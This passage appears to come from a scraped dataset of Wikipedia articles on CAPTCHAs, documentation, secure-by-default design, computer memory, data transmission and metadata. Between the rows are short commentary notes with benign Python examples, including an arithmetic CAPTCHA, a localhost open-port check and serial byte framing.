generating the CAPTCHA is client-side (the validation is done on a server but the text that the user is required to identify is rendered on the client side), then users can modify the client to display the un-rendered text. Some CAPTCHA systems use MD5 hashes stored client-side, which may leave the CAPTCHA vulnerable to a brute-force attack. 47 Some researchers have proposed alternatives, including image recognition CAPTCHAs which require users to identify simple objects in the images presented. 
The argument in favor of these schemes is that tasks like object recognition are more complex to perform than text recognition and therefore should be more resilient to machine learning-based attacks. Chew et al. published their work in the 7th International Information Security Conference, ISC'04, proposing three different versions of image recognition CAPTCHAs and validating the proposal with user studies. It is suggested that one of the versions, the anomaly CAPTCHA, is best, with 100% of human users being able to pass an anomaly CAPTCHA with at least 90% probability in 42 seconds. 48 Datta et al. published their paper in the ACM Multimedia '05 Conference, named IMAGINATION (IMAge Generation for INternet AuthenticaTION), proposing a systematic approach to image recognition CAPTCHAs. Images are distorted so that image recognition approaches cannot recognise them. 49 Microsoft (Jeremy Elson, John R. Douceur, Jon Howell, and Jared Saul) claim to have developed Animal Species Image Recognition for Restricting Access (ASIRRA), which asks users to distinguish cats from dogs. Microsoft had a beta version of this for websites to use. 50 They claim "Asirra is easy for users; it can be solved by humans 99.6% of the time in under 30 seconds. Anecdotally, users seemed to find the experience of using Asirra much more enjoyable than a text-based CAPTCHA." This solution was described in a 2007 paper in Proceedings of the 14th ACM Conference on Computer and Communications Security (CCS). 51 It was closed in October 2014. 52 |
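The CAPTCHA entry above mentions arithmetic challenges ("MAPTCHAs"), in which the user is shown a simple equation and must type the solution. Below is a minimal, illustrative sketch of that idea in Python; the function names are my own, and this is not how reCAPTCHA, hCaptcha, or any production service works.

import random
import operator

# Minimal sketch of the "MAPTCHA" idea described above: generate a simple
# arithmetic challenge and verify the user's answer. Names are illustrative.
def generate_maptcha():
    a, b = random.randint(1, 9), random.randint(1, 9)
    op_symbol, op_func = random.choice([("+", operator.add), ("-", operator.sub), ("*", operator.mul)])
    question = f"What is {a} {op_symbol} {b}?"
    answer = op_func(a, b)
    return question, answer

def check_maptcha(expected_answer, user_input):
    try:
        return int(user_input.strip()) == expected_answer
    except ValueError:
        return False

# Example usage:
# question, answer = generate_maptcha()
# print(question)
# print("Passed!" if check_maptcha(answer, input("> ")) else "Failed.")

As the entry notes, challenges like this are easy for software to defeat, so such a scheme only makes sense where accessibility matters more than robustness.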
198 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Documentation | Documentation is any communicable material that is used to describe, explain or instruct regarding some attributes of an object, system or procedure, such as its parts, assembly, installation, maintenance, and use. 1 As a form of knowledge management and knowledge organization, documentation can be provided on paper, online, or on digital or analog media, such as audio tape or CDs. Examples are user guides, white papers, online help, and quick-reference guides. Paper or hard-copy documentation has become less common. citation needed Documentation is often distributed via websites, software products, and other online applications. Documentation as a set of instructional materials shouldn't be confused with documentation science, the study of the recording and retrieval of information. While associated International Organization for Standardization (ISO) standards are not easily available publicly, a guide from other sources for this topic may serve the purpose. 2 3 4 5 Documentation development may involve document drafting, formatting, submitting, reviewing, approving, distributing, reposting and tracking, etc., and are convened by associated standard operating procedure in a regulatory industry. It could also involve creating content from scratch. Documentation should be easy to read and understand. If it is too long and too wordy, it may be misunderstood or ignored. Clear, concise words should be used, and sentences should be limited to a maximum of 15 words. Documentation intended for a general audience should avoid gender-specific terms and cultural biases. In a series of procedures, steps should be clearly numbered. 6 7 8 9 Technical writers and corporate communicators are professionals whose field and work is documentation. Ideally, technical writers have a background in both the subject matter and also in writing, managing content, and information architecture. Technical writers more commonly collaborate with subject-matter experts, such as engineers, technical experts, medical professionals, etc. to define and then create documentation to meet the user's needs. Corporate communications includes other types of written documentation, for example: The following are typical software documentation types: The following are typical hardware and service documentation types: A common type of software document written in the simulation industry is the SDF. When developing software for a simulator, which can range from embedded avionics devices to 3D terrain databases by way of full motion control systems, the engineer keeps a notebook detailing the development "the build" of the project or module. The document can be a wiki page, Microsoft Word document or other environment. They should contain a requirements section, an interface section to detail the communication interface of the software. Often a notes section is used to detail the proof of concept, and then track errors and enhancements. Finally, a testing section to document how the software was tested. This documents conformance to the client's requirements. The result is a detailed description of how the software is designed, how to build and install the software on the target device, and any known defects and workarounds. This build document enables future developers and maintainers to come up to speed on the software in a timely manner, and also provides a roadmap to modifying code or searching for bugs. 
These software tools can automatically collect data about your network equipment. The data could be for inventory and for configuration information. The Information Technology Infrastructure Library calls for the creation of such a database as a basis for all information for those responsible for IT. It is also the basis for IT documentation. Examples include XIA Configuration. 11 "Documentation" is the preferred term for the process of populating criminal databases. Examples include the National Counterterrorism Center's Terrorist Identities Datamart Environment, sex offender registries, and gang databases. 12 Documentation, as it pertains to the early childhood education field, is "when we notice and value children's ideas, thinking, questions, and theories about the world and then collect traces of their work (drawings, photographs of the children in action, and transcripts of their words) to share with a wider community". 13 Thus, documentation is a process used to link the educator's knowledge and learning of the child/children with the families, other collaborators, and even the children themselves. Documentation is an integral part of the cycle of inquiry: observing, reflecting, documenting, sharing and responding. 13 Pedagogical documentation, in terms of the teacher documentation, is the "teacher's story of the movement in children's understanding". 13 According to Stephanie Cox Suarez in "Documentation - Transforming our Perspectives", "teachers are considered researchers, and documentation is a research tool to support knowledge building among children and adults". 14 Documentation can take many different styles in the classroom. The following exemplifies ways in which documentation can make the research, or learning, visible: Documentation is certainly a process in and of itself, and it is also a process within the educator. The following is the development of documentation as it progresses for and in the educator themselves: |
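The documentation entry above recommends keeping sentences to roughly 15 words. In the spirit of this notebook's text processing, the sketch below flags over-long sentences; the naive regex-based sentence splitting, the threshold default, and the function name are my own assumptions, not part of any documentation standard.

import re

# Minimal sketch: flag sentences longer than the 15-word guideline mentioned
# above. The sentence splitting is naive (splits on ., ! and ?); names and
# the default threshold are illustrative.
def flag_long_sentences(text, max_words=15):
    sentences = [s.strip() for s in re.split(r"[.!?]+", text) if s.strip()]
    return [s for s in sentences if len(s.split()) > max_words]

# Example usage:
# doc = "This sentence is short. This one, however, keeps going and going well past the recommended limit for clear documentation."
# for s in flag_long_sentences(doc):
#     print("Too long:", s)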
199 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Secure_by_default | Security by default, in software, means that the default configuration settings are the most secure settings possible, which are not necessarily the most user-friendly settings. In many cases, security and user-friendliness are evaluated based on both risk analysis and usability tests. This leads to the discussion of what the most secure settings are. As a result, the precise meaning of "secure by default" remains undefined. In a network operating system, this typically means first and foremost that there are no listening INET(6) domain sockets after installation; that is, no open network ports. This can be checked on the local machine with a tool like netstat and remotely with a port scanner such as nmap. As a general rule, a secure network is only as secure as the least secure node in the entire network. If a program uses secure configuration settings by default, the user will be better protected. However, not all users consider security and may be obstructed by secure settings. A common example is whether or not blank passwords are allowed for login. Not everyone can, or is willing to, type or memorize a password. Another way to secure a program or system is through abstraction, where the user is presented with an interface in which the user cannot (or is discouraged to) cause accidental data loss. This, however, can lead to less functionality or reduced flexibility. Having user-controlled preferences does not typically cause this, but it comes at the cost of a larger part of the user interface being devoted to configuration controls. Some servers or devices that have an authentication system have default usernames and passwords. If not properly changed, anyone who knows the default configuration can successfully authenticate. For non-unique defaults, this practice would violate the principle of 'security by default'. OpenBSD claims to be the only operating system that is fully secure by default. This, however, does not mean it is inherently the most secure operating system, because that depends on the definition of an operating system. There are many operating systems that are not capable of networking with other systems, and when considering the number of network-based security compromises today, one can argue that such an operating system is more secure. OpenBSD is a network operating system. Ubuntu is a Linux distribution aimed at desktop users that hides the administrative account by default and only allows the first user to gain administrative privileges for certain system tasks (such as installing system updates and managing disk drives). macOS does not hide this account, but users with limited rights can still fully utilise the system. Microsoft Windows and Linspire have been criticized for allowing the user to have administrative privileges without warning—a potential threat to the system. Windows Vista and subsequent versions of Windows attempt to remedy this situation through their User Account Control system. |
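The secure-by-default entry above notes that open ports can be checked locally with netstat and remotely with a port scanner such as nmap. The sketch below is a rough, standard-library stand-in for such a check: it probes a handful of common TCP ports on localhost and reports which accept connections. The port list and function name are illustrative; a real audit would still use netstat, ss, or nmap.

import socket

# Minimal sketch of a local "open port" check in the spirit of netstat/nmap:
# try to connect to a few common TCP ports on localhost and report which ones
# accept connections. The port list is illustrative, not exhaustive.
def check_local_ports(ports=(22, 25, 80, 443, 3306, 5432, 8080)):
    open_ports = []
    for port in ports:
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
            s.settimeout(0.5)
            if s.connect_ex(("127.0.0.1", port)) == 0:  # 0 means the connection succeeded
                open_ports.append(port)
    return open_ports

# Example usage:
# print("Listening ports found:", check_local_ports())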
200 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Memory_(computers) | Computer memory stores information, such as data and programs, for immediate use in the computer. 2 The term memory is often synonymous with the terms RAM, main memory, or primary storage. Archaic synonyms for main memory include core (for magnetic core memory) and store. 3 Main memory operates at a high speed compared to mass storage which is slower but less expensive per bit and higher in capacity. Besides storing opened programs and data being actively processed, computer memory serves as a mass storage cache and write buffer to improve both reading and writing performance. Operating systems borrow RAM capacity for caching so long as it is not needed by running software. 4 If needed, contents of the computer memory can be transferred to storage; a common way of doing this is through a memory management technique called virtual memory. Modern computer memory is implemented as semiconductor memory, 5 6 where data is stored within memory cells built from MOS transistors and other components on an integrated circuit. 7 There are two main kinds of semiconductor memory: volatile and non-volatile. Examples of non-volatile memory are flash memory and ROM, PROM, EPROM, and EEPROM memory. Examples of volatile memory are dynamic random-access memory (DRAM) used for primary storage and static random-access memory (SRAM) used mainly for CPU cache. Most semiconductor memory is organized into memory cells each storing one bit (0 or 1). Flash memory organization includes both one bit per memory cell and a multi-level cell capable of storing multiple bits per cell. The memory cells are grouped into words of fixed word length, for example, 1, 2, 4, 8, 16, 32, 64 or 128 bits. Each word can be accessed by a binary address of N bits, making it possible to store 2N words in the memory. In the early 1940s, memory technology often permitted a capacity of a few bytes. The first electronic programmable digital computer, the ENIAC, using thousands of vacuum tubes, could perform simple calculations involving 20 numbers of ten decimal digits stored in the vacuum tubes. The next significant advance in computer memory came with acoustic delay-line memory, developed by J. Presper Eckert in the early 1940s. Through the construction of a glass tube filled with mercury and plugged at each end with a quartz crystal, delay lines could store bits of information in the form of sound waves propagating through the mercury, with the quartz crystals acting as transducers to read and write bits. Delay-line memory was limited to a capacity of up to a few thousand bits. Two alternatives to the delay line, the Williams tube and Selectron tube, originated in 1946, both using electron beams in glass tubes as means of storage. Using cathode-ray tubes, Fred Williams invented the Williams tube, which was the first random-access computer memory. The Williams tube was able to store more information than the Selectron tube (the Selectron was limited to 256 bits, while the Williams tube could store thousands) and was less expensive. The Williams tube was nevertheless frustratingly sensitive to environmental disturbances. Efforts began in the late 1940s to find non-volatile memory. Magnetic-core memory allowed for memory recall after power loss. It was developed by Frederick W. Viehe and An Wang in the late 1940s, and improved by Jay Forrester and Jan A. 
Rajchman in the early 1950s, before being commercialized with the Whirlwind I computer in 1953. 8 Magnetic-core memory was the dominant form of memory until the development of MOS semiconductor memory in the 1960s. 9 The first semiconductor memory was implemented as a flip-flop circuit in the early 1960s using bipolar transistors. 9 Semiconductor memory made from discrete devices was first shipped by Texas Instruments to the United States Air Force in 1961. In the same year, the concept of solid-state memory on an integrated circuit (IC) chip was proposed by applications engineer Bob Norman at Fairchild Semiconductor. 10 The first bipolar semiconductor memory IC chip was the SP95 introduced by IBM in 1965. 9 While semiconductor memory offered improved performance over magnetic-core memory, it remained larger and more expensive and did not displace magnetic-core memory until the late 1960s. 9 11 The invention of the metal oxide semiconductor field-effect transistor (MOSFET) enabled the practical use of metal oxide semiconductor (MOS) transistors as memory cell storage elements. MOS memory was developed by John Schmidt at Fairchild Semiconductor in 1964. 12 In addition to higher performance, MOS semiconductor memory was cheaper and consumed less power than magnetic core memory. 13 In 1965, J. Wood and R. Ball of the Royal Radar Establishment proposed digital storage systems that use CMOS (complementary MOS) memory cells, in addition to MOSFET power devices for the power supply, switched cross-coupling, switches and delay-line storage. 14 The development of silicon-gate MOS integrated circuit (MOS IC) technology by Federico Faggin at Fairchild in 1968 enabled the production of MOS memory chips. 15 NMOS memory was commercialized by IBM in the early 1970s. 16 MOS memory overtook magnetic core memory as the dominant memory technology in the early 1970s. 13 The two main types of volatile random-access memory (RAM) are static random-access memory (SRAM) and dynamic random-access memory (DRAM). Bipolar SRAM was invented by Robert Norman at Fairchild Semiconductor in 1963, 9 followed by the development of MOS SRAM by John Schmidt at Fairchild in 1964. 13 SRAM became an alternative to magnetic-core memory, but requires six transistors for each bit of data. 17 Commercial use of SRAM began in 1965, when IBM introduced their SP95 SRAM chip for the System 360 Model 95. 9 Toshiba introduced bipolar DRAM memory cells for its Toscal BC 1411 electronic calculator in 1965. 18 19 While it offered improved performance, bipolar DRAM could not compete with the lower price of the then dominant magnetic-core memory. 20 MOS technology is the basis for modern DRAM. In 1966, Robert H. Dennard at the IBM Thomas J. Watson Research Center was working on MOS memory. While examining the characteristics of MOS technology, he found it was possible to build capacitors, and that storing a charge or no charge on the MOS capacitor could represent the 1 and 0 of a bit, while the MOS transistor could control writing the charge to the capacitor. This led to his development of a single-transistor DRAM memory cell. 17 In 1967, Dennard filed a patent for a single-transistor DRAM memory cell based on MOS technology. 21 This led to the first commercial DRAM IC chip, the Intel 1103 in October 1970. 22 23 24 Synchronous dynamic random-access memory (SDRAM) later debuted with the Samsung KM48SL2000 chip in 1992. 
25 26 The term memory is also often used to refer to non-volatile memory including read-only memory (ROM) through modern flash memory. Programmable read-only memory (PROM) was invented by Wen Tsing Chow in 1956, while working for the Arma Division of the American Bosch Arma Corporation. 27 28 In 1967, Dawon Kahng and Simon Sze of Bell Labs proposed that the floating gate of a MOS semiconductor device could be used for the cell of a reprogrammable ROM, which led to Dov Frohman of Intel inventing EPROM (erasable PROM) in 1971. 29 EEPROM (electrically erasable PROM) was developed by Yasuo Tarui, Yutaka Hayashi and Kiyoko Naga at the Electrotechnical Laboratory in 1972. 30 Flash memory was invented by Fujio Masuoka at Toshiba in the early 1980s. 31 32 Masuoka and colleagues presented the invention of NOR flash in 1984, 33 and then NAND flash in 1987. 34 Toshiba commercialized NAND flash memory in 1987. 35 36 37 Developments in technology and economies of scale have made possible so-called very large memory (VLM) computers. 37 Volatile memory is computer memory that requires power to maintain the stored information. Most modern semiconductor volatile memory is either static RAM (SRAM) or dynamic RAM (DRAM). a DRAM dominates for desktop system memory. SRAM is used for CPU cache. SRAM is also found in small embedded systems requiring little memory. SRAM retains its contents as long as the power is connected and may use a simpler interface, but commonly uses six transistors per bit. Dynamic RAM is more complicated for interfacing and control, needing regular refresh cycles to prevent losing its contents, but uses only one transistor and one capacitor per bit, allowing it to reach much higher densities and much cheaper per-bit costs. 2 23 37 Non-volatile memory can retain the stored information even when not powered. Examples of non-volatile memory include read-only memory, flash memory, most types of magnetic computer storage devices (e.g. hard disk drives, floppy disks and magnetic tape), optical discs, and early computer storage methods such as magnetic drum, paper tape and punched cards. 37 Non-volatile memory technologies under development include ferroelectric RAM, programmable metallization cell, Spin-transfer torque magnetic RAM, SONOS, resistive random-access memory, racetrack memory, Nano-RAM, 3D XPoint, and millipede memory. A third category of memory is semi-volatile. The term is used to describe a memory that has some limited non-volatile duration after power is removed, but then data is ultimately lost. A typical goal when using a semi-volatile memory is to provide the high performance and durability associated with volatile memories while providing some benefits of non-volatile memory. For example, some non-volatile memory types experience wear when written. A worn cell has increased volatility but otherwise continues to work. Data locations which are written frequently can thus be directed to use worn circuits. As long as the location is updated within some known retention time, the data stays valid. After a period of time without update, the value is copied to a less-worn circuit with longer retention. Writing first to the worn area allows a high write rate while avoiding wear on the not-worn circuits. 38 As a second example, an STT-RAM can be made non-volatile by building large cells, but doing so raises the cost per bit and power requirements and reduces the write speed. Using small cells improves cost, power, and speed, but leads to semi-volatile behavior. 
In some applications, the increased volatility can be managed to provide many benefits of a non-volatile memory, for example by removing power but forcing a wake-up before data is lost; or by caching read-only data and discarding the cached data if the power-off time exceeds the non-volatile threshold. 39 The term semi-volatile is also used to describe semi-volatile behavior constructed from other memory types, such as nvSRAM, which combines SRAM and a non-volatile memory on the same chip, where an external signal copies data from the volatile memory to the non-volatile memory, but if power is removed before the copy occurs, the data is lost. Another example is battery-backed RAM, which uses an external battery to power the memory device in case of external power loss. If power is off for an extended period of time, the battery may run out, resulting in data loss. 37 Proper management of memory is vital for a computer system to operate properly. Modern operating systems have complex systems to properly manage memory. Failure to do so can lead to bugs or slow performance. Improper management of memory is a common cause of bugs and security vulnerabilities, including the following types: Virtual memory is a system where physical memory is managed by the operating system typically with assistance from a memory management unit, which is part of many modern CPUs. It allows multiple types of memory to be used. For example, some data can be stored in RAM while other data is stored on a hard drive (e.g. in a swapfile), functioning as an extension of the cache hierarchy. This offers several advantages. Computer programmers no longer need to worry about where their data is physically stored or whether the user's computer will have enough memory. The operating system will place actively used data in RAM, which is much faster than hard disks. When the amount of RAM is not sufficient to run all the current programs, it can result in a situation where the computer spends more time moving data from RAM to disk and back than it does accomplishing tasks; this is known as thrashing. Protected memory is a system where each program is given an area of memory to use and is prevented from going outside that range. If the operating system detects that a program has tried to alter memory that does not belong to it, the program is terminated (or otherwise restricted or redirected). This way, only the offending program crashes, and other programs are not affected by the misbehavior (whether accidental or intentional). Use of protected memory greatly enhances both the reliability and security of a computer system. Without protected memory, it is possible that a bug in one program will alter the memory used by another program. This will cause that other program to run off of corrupted memory with unpredictable results. If the operating system's memory is corrupted, the entire computer system may crash and need to be rebooted. At times programs intentionally alter the memory used by other programs. This is done by viruses and malware to take over computers. It may also be used benignly by desirable programs which are intended to modify other programs, debuggers, for example, to insert breakpoints or hooks. |
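The memory entry above states that a binary address of N bits can select 2^N words, each of a fixed word length. A small sketch of that arithmetic, with illustrative names and example values:

# Minimal sketch of the addressing arithmetic described above: a binary
# address of N bits can select 2**N distinct words, so total capacity is
# 2**N words times the word length. Names and example values are illustrative.
def memory_capacity_bits(address_bits, word_length_bits):
    words = 2 ** address_bits          # number of addressable words
    return words * word_length_bits    # total capacity in bits

# Example: a 16-bit address with 8-bit words
# 2**16 = 65,536 words -> 65,536 * 8 = 524,288 bits (64 KiB)
# print(memory_capacity_bits(16, 8) // 8, "bytes")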
201 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Data_transmission | Data communication, including data transmission and data reception, is the transfer of data, transmitted and received over a point-to-point or point-to-multipoint communication channel. Examples of such channels are copper wires, optical fibers, wireless communication using radio spectrum, storage media and computer buses. The data are represented as an electromagnetic signal, such as an electrical voltage, radiowave, microwave, or infrared signal. Analog transmission is a method of conveying voice, data, image, signal or video information using a continuous signal which varies in amplitude, phase, or some other property in proportion to that of a variable. The messages are either represented by a sequence of pulses by means of a line code (baseband transmission), or by a limited set of continuously varying waveforms (passband transmission), using a digital modulation method. The passband modulation and corresponding demodulation is carried out by modem equipment. Digital communications, including digital transmission and digital reception, is the transfer of either a digitized analog signal or a born-digital bitstream. 1 According to the most common definition, both baseband and passband bit-stream components are considered part of a digital signal; an alternative definition considers only the baseband signal as digital, and passband transmission of digital data as a form of digital-to-analog conversion. Courses and textbooks in the field of data transmission 1 as well as digital transmission 2 3 and digital communications 4 5 have similar content. Digital transmission or data transmission traditionally belongs to telecommunications and electrical engineering. Basic principles of data transmission may also be covered within the computer science or computer engineering topic of data communications, which also includes computer networking applications and communication protocols, for example routing, switching and inter-process communication. Although the Transmission Control Protocol (TCP) involves transmission, TCP and other transport layer protocols are covered in computer networking but not discussed in a textbook or course about data transmission. In most textbooks, the term analog transmission only refers to the transmission of an analog message signal (without digitization) by means of an analog signal, either as a non-modulated baseband signal or as a passband signal using an analog modulation method such as AM or FM. It may also include analog-over-analog pulse modulated baseband signals such as pulse-width modulation. In a few books within the computer networking tradition, analog transmission also refers to passband transmission of bit-streams using digital modulation methods such as FSK, PSK and ASK. Note that these methods are covered in textbooks named digital transmission or data transmission, for example. 1 The theoretical aspects of data transmission are covered by information theory and coding theory. Courses and textbooks in the field of data transmission typically deal with the following OSI model protocol layers and topics: It is also common to deal with the cross-layer design of those three layers. 7 Data (mainly but not exclusively informational) has been sent via non-electronic (e.g. optical, acoustic, mechanical) means since the advent of communication. Analog signal data has been sent electronically since the advent of the telephone. 
However, the first data electromagnetic transmission applications in modern time were electrical telegraphy (1809) and teletypewriters (1906), which are both digital signals. The fundamental theoretical work in data transmission and information theory by Harry Nyquist, Ralph Hartley, Claude Shannon and others during the early 20th century, was done with these applications in mind. In the early 1960s, Paul Baran invented distributed adaptive message block switching for digital communication of voice messages using switches that were low-cost electronics. 8 9 Donald Davies invented and implemented modern data communication during 1965 7, including packet switching, high-speed routers, communication protocols, hierarchical computer networks and the essence of the end-to-end principle. 10 11 12 13 Baran's work did not include routers with software switches and communication protocols, nor the idea that users, rather than the network itself, would provide the reliability. 14 15 16 Both were seminal contributions that influenced the development of computer networks. 17 18 Data transmission is utilized in computers in computer buses and for communication with peripheral equipment via parallel ports and serial ports such as RS 232 (1969), FireWire (1995) and USB (1996). The principles of data transmission are also utilized in storage media for error detection and correction since 1951. The first practical method to overcome the problem of receiving data accurately by the receiver using digital code was the Barker code invented by Ronald Hugh Barker in 1952 and published in 1953. 19 Data transmission is utilized in computer networking equipment such as modems (1940), local area network (LAN) adapters (1964), repeaters, repeater hubs, microwave links, wireless network access points (1997), etc. In telephone networks, digital communication is utilized for transferring many phone calls over the same copper cable or fiber cable by means of pulse-code modulation (PCM) in combination with time-division multiplexing (TDM) (1962). Telephone exchanges have become digital and software controlled, facilitating many value-added services. For example, the first AXE telephone exchange was presented in 1976. Digital communication to the end user using Integrated Services Digital Network (ISDN) services became available in the late 1980s. Since the end of the 1990s, broadband access techniques such as ADSL, Cable modems, fiber-to-the-building (FTTB) and fiber-to-the-home (FTTH) have become widespread to small offices and homes. The current tendency is to replace traditional telecommunication services with packet mode communication such as IP telephony and IPTV. Transmitting analog signals digitally allows for greater signal processing capability. The ability to process a communications signal means that errors caused by random processes can be detected and corrected. Digital signals can also be sampled instead of continuously monitored. The multiplexing of multiple digital signals is much simpler compared to the multiplexing of analog signals. Because of all these advantages, because of the vast demand to transmit computer data and the ability of digital communications to do so and because recent advances in wideband communication channels and solid-state electronics have allowed engineers to realize these advantages fully, digital communications have grown quickly. The digital revolution has also resulted in many digital telecommunication applications where the principles of data transmission are applied. 
Examples include second-generation (1991) and later cellular telephony, video conferencing, digital TV (1998), digital radio (1999), and telemetry. Data transmission, digital transmission or digital communications is the transfer of data over a point-to-point or point-to-multipoint communication channel. Examples of such channels include copper wires, optical fibers, wireless communication channels, storage media and computer buses. The data are represented as an electromagnetic signal, such as an electrical voltage, radiowave, microwave, or infrared light. While analog transmission is the transfer of a continuously varying analog signal over an analog channel, digital communication is the transfer of discrete messages over a digital or an analog channel. The messages are either represented by a sequence of pulses by means of a line code (baseband transmission), or by a limited set of continuously varying wave forms (passband transmission), using a digital modulation method. The passband modulation and corresponding demodulation (also known as detection) is carried out by modem equipment. According to the most common definition of a digital signal, both baseband and passband signals representing bit-streams are considered as digital transmission, while an alternative definition only considers the baseband signal as digital, and passband transmission of digital data as a form of digital-to-analog conversion. citation needed Data transmitted may be digital messages originating from a data source, for example a computer or a keyboard. It may also be an analog signal such as a phone call or a video signal, digitized into a bit-stream for example using pulse-code modulation (PCM) or more advanced source coding (analog-to-digital conversion and data compression) schemes. This source coding and decoding is carried out by codec equipment. In telecommunications, serial transmission is the sequential transmission of signal elements of a group representing a character or other entity of data. Digital serial transmissions are bits sent over a single wire, frequency or optical path sequentially. Because it requires less signal processing and less chances for error than parallel transmission, the transfer rate of each individual path may be faster. This can be used over longer distances and a check digit or parity bit can be sent along with the data easily. Parallel transmission is the simultaneous transmission of related signal elements over two or more separate paths. Multiple electrical wires are used which can transmit multiple bits simultaneously, which allows for higher data transfer rates than can be achieved with serial transmission. This method is typically used internally within the computer, for example, the internal buses, and sometimes externally for such things as printers. Timing skew can be a significant issue in these systems because the wires in parallel data transmission unavoidably have slightly different properties so some bits may arrive before others, which may corrupt the message. This issue tends to worsen with distance making parallel data transmission less reliable for long distances. Some communications channel types include: Asynchronous serial communication uses start and stop bits to signify the beginning and end of transmission. 20 This method of transmission is used when data are sent intermittently as opposed to in a solid stream. Synchronous transmission synchronizes transmission speeds at both the receiving and sending end of the transmission using clock signals. 
The clock may be a separate signal or embedded in the data. A continual stream of data is then sent between the two nodes. Due to there being no start and stop bits, the data transfer rate may be more efficient. |
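The data-transmission entry above describes asynchronous serial communication, where start and stop bits mark the beginning and end of each character and a parity bit can be sent along with the data. The sketch below frames a single byte in that style; the LSB-first bit order and even parity are assumptions modeled on common UART practice, not details taken from the entry.

# Minimal sketch of asynchronous serial framing as described above: each byte
# is wrapped with a start bit, an optional even-parity bit, and a stop bit.
# LSB-first bit order mirrors common UART practice; names are illustrative.
def frame_byte(byte, use_parity=True):
    data_bits = [(byte >> i) & 1 for i in range(8)]   # data bits, LSB first
    frame = [0] + data_bits                           # start bit is 0
    if use_parity:
        frame.append(sum(data_bits) % 2)              # even parity bit
    frame.append(1)                                   # stop bit is 1
    return frame

# Example usage:
# print(frame_byte(ord("A")))  # ord("A") == 65 == 0b01000001

Synchronous transmission, by contrast, dispenses with the start and stop bits and relies on a shared or embedded clock, which is why the entry notes it can be more efficient.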
202 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Metadata | Metadata (or metainformation) is "data that provides information about other data", 1 but not the content of the data itself, such as the text of a message or the image itself. 2 There are many distinct types of metadata, including: Metadata is not strictly bound to one of these categories, as it can describe a piece of data in many other ways. Metadata has various purposes. It can help users find relevant information and discover resources. It can also help organize electronic resources, provide digital identification, and archive and preserve resources. Metadata allows users to access resources by "allowing resources to be found by relevant criteria, identifying resources, bringing similar resources together, distinguishing dissimilar resources, and giving location information". 8 Metadata of telecommunication activities including Internet traffic is very widely collected by various national governmental organizations. This data is used for the purposes of traffic analysis and can be used for mass surveillance. 9 Metadata was traditionally used in the card catalogs of libraries until the 1980s when libraries converted their catalog data to digital databases. 10 In the 2000s, as data and information were increasingly stored digitally, this digital data was described using metadata standards. 11 The first description of "meta data" for computer systems is purportedly noted by MIT's Center for International Studies experts David Griffel and Stuart McIntosh in 1967: "In summary then, we have statements in an object language about subject descriptions of data and token codes for the data. We also have statements in a meta language describing the data relationships and transformations, and ought is relations between norm and data. 12 Unique metadata standards exist for different disciplines (e.g., museum collections, digital audio files, websites, etc.). Describing the contents and context of data or data files increases its usefulness. For example, a web page may include metadata specifying what software language the page is written in (e.g., HTML), what tools were used to create it, what subjects the page is about, and where to find more information about the subject. This metadata can automatically improve the reader's experience and make it easier for users to find the web page online. 13 A CD may include metadata providing information about the musicians, singers, and songwriters whose work appears on the disc. In many countries, government organizations routinely store metadata about emails, telephone calls, web pages, video traffic, IP connections, and cell phone locations. citation needed Metadata means "data about data". Metadata is defined as the data providing information about one or more aspects of the data; it is used to summarize basic information about data that can make tracking and working with specific data easier. 14 Some examples include: For example, a digital image may include metadata that describes the size of the image, its color depth, resolution, when it was created, the shutter speed, and other data. 15 A text document's metadata may contain information about how long the document is, who the author is, when the document was written, and a short summary of the document. Metadata within web pages can also contain descriptions of page content, as well as key words linked to the content. 
16 These links are often called "Metatags", which were used as the primary factor in determining order for a web search until the late 1990s. 16 The reliance on metatags in web searches was decreased in the late 1990s because of "keyword stuffing", 16 whereby metatags were being largely misused to trick search engines into thinking some websites had more relevance in the search than they really did. 16 Metadata can be stored and managed in a database, often called a metadata registry or metadata repository. 17 However, without context and a point of reference, it might be impossible to identify metadata just by looking at it. 18 For example: by itself, a database containing several numbers, all 13 digits long could be the results of calculations or a list of numbers to plug into an equation without any other context, the numbers themselves can be perceived as the data. But if given the context that this database is a log of a book collection, those 13 digit numbers may now be identified as ISBNs information that refers to the book, but is not itself the information within the book. The term "metadata" was coined in 1968 by Philip Bagley, in his book "Extension of Programming Language Concepts" where it is clear that he uses the term in the ISO 11179 "traditional" sense, which is "structural metadata" i.e. "data about the containers of data"; rather than the alternative sense "content about individual instances of data content" or metacontent, the type of data usually found in library catalogs. 19 20 Since then the fields of information management, information science, information technology, librarianship, and GIS have widely adopted the term. In these fields, the word metadata is defined as "data about data". 21 While this is the generally accepted definition, various disciplines have adopted their own more specific explanations and uses of the term. Slate reported in 2013 that the United States government's interpretation of "metadata" could be broad, and might include message content such as the subject lines of emails. 22 While the metadata application is manifold, covering a large variety of fields, there are specialized and well-accepted models to specify types of metadata. Bretherton Singley (1994) distinguish between two distinct classes: structural control metadata and guide metadata. 23 Structural metadata describes the structure of database objects such as tables, columns, keys and indexes. Guide metadata helps humans find specific items and is usually expressed as a set of keywords in a natural language. According to Ralph Kimball, metadata can be divided into three categories: technical metadata (or internal metadata), business metadata (or external metadata), and process metadata. NISO distinguishes three types of metadata: descriptive, structural, and administrative. 21 Descriptive metadata is typically used for discovery and identification, as information to search and locate an object, such as title, authors, subjects, keywords, and publisher. Structural metadata describes how the components of an object are organized. An example of structural metadata would be how pages are ordered to form chapters of a book. Finally, administrative metadata gives information to help manage the source. Administrative metadata refers to the technical information, such as file type, or when and how the file was created. Two sub-types of administrative metadata are rights management metadata and preservation metadata. 
